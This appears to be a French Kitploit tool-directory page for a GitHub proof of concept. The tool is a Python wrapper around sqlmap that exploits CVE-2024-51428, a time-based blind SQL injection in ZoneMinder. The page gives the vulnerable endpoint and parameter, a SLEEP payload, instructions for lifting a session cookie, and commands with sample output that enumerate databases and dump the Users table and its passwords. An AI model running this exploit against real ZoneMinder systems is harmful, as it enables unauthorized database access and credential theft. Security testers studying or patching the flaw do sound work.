Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51428-PoC — Wrapper en Python pour exploiter CVE-2024-51428 dans ZoneMinder via une injection SQL aveugle en utilisant sqlmap, automatisant l'énumération des bases de données, des tables et l'extraction de données avec une sortie claire. | Kitploit
Outils/GitHubGitHub/d1se0/cve-2024-51428-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Wrapper en Python pour exploiter CVE-2024-51428 dans ZoneMinder via une injection SQL aveugle en utilisant sqlmap, automatisant l'énumération des bases de données, des tables et l'extraction de données avec une sortie claire.

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-51428 - PoC d'injection SQL aveugle ZoneMinder

Wrapper Python pour sqlmap conçu pour exploiter CVE-2024-51428 dans ZoneMinder.
Cet outil automatise la détection et l'exploitation d'une vulnérabilité d'injection SQL aveugle tout en gardant une sortie propre et concentrée sur les données utiles.

Le script masque les journaux de sqlmap et n'affiche que les informations pertinentes telles que :

  • Point d'injection détecté
  • Noms des bases de données
  • Tables
  • Identifiants ou données sensibles extraits

Cela rend l'outil idéal pour les environnements CTF, les démonstrations et les tests de sécurité.


Présentation de la vulnérabilité

CVE: CVE-2024-51428
Type: Injection SQL aveugle
Logiciel concerné: ZoneMinder
Vecteur d'attaque: paramètre HTTP GET
Paramètre: tid

La vulnérabilité existe dans le point de terminaison suivant :

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

Le paramètre tid n'est pas correctement assaini avant d'être utilisé dans une requête de base de données, ce qui permet à un attaquant d'injecter des requêtes SQL.

La technique d'exploitation utilisée est l'injection SQL aveugle basée sur le temps.

Exemple de charge utile découverte par sqlmap :

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Cette charge utile force la base de données à patienter si la requête est exécutée avec succès, confirmant ainsi la présence d'une injection SQL.


Fonctionnalités

  • Détection automatique d'injection SQL aveugle
  • Énumération des bases de données
  • Énumération des tables
  • Extraction (dump) des tables
  • Filtrage des colonnes
  • Filtrage des lignes
  • Sortie propre (journaux sqlmap masqués)
  • Conçu pour les laboratoires CTF et de pentest

Prérequis

  • Python 3
  • sqlmap

Installez sqlmap si nécessaire :

root@kitploit:~
sudo apt install sqlmap

Utilisation

Syntaxe de base :

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

Avec cette commande, nous vérifions si la cible est vulnérable ou non

Exemple :

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Obtenir le cookie requis

L'exploit nécessite un cookie de session ZoneMinder valide.

Étapes :

  1. Ouvrez la cible dans votre navigateur
  2. Ouvrez les outils de développement
  3. Naviguez jusqu'à :
root@kitploit:~
Application → Cookies
  1. Localisez le cookie nommé :
root@kitploit:~
ZMSESSID
  1. Copiez sa valeur et utilisez-la avec -c

Exemple :

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Vérifier si la cible est vulnérable

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Exemple de sortie :

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Énumérer les bases de données

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Exemple de sortie :

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Énumérer les tables

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Exemple de sortie :

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Extraire une table

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Extraire une colonne spécifique

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Exemple :

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Filtrer les lignes (clause WHERE)

Vous pouvez filtrer les lignes en utilisant :

root@kitploit:~
-ff <COLUMN> <VALUE>

Exemple :

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

SQL équivalent :

root@kitploit:~
WHERE Username='mark'

Extraire le mot de passe d'un utilisateur spécifique

Exemple :

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Commande sqlmap interne :

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Comment fonctionne l'outil

Le script agit comme un wrapper autour de sqlmap.

Étapes effectuées en interne :

  1. Construire le point de terminaison vulnérable
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Transmettre le cookie d'authentification à sqlmap
  2. Exécuter sqlmap avec des options optimisées :
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Analyser la sortie de sqlmap en temps réel
  2. Filtrer les journaux et afficher uniquement :
  • les informations d'injection
  • les bases de données
  • les tables
  • les données extraites

Utilisation prévue

Cet outil a été créé pour :

  • Les challenges Capture The Flag
  • La recherche en sécurité
  • Des fins pédagogiques
  • Les laboratoires de pentest

Avertissement

Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

L'auteur n'est pas responsable d'une mauvaise utilisation de cet outil.

Obtenez toujours une autorisation appropriée avant de tester un système.


Auteur

Recherche en sécurité / Outillage CTF

Télécharger l’outil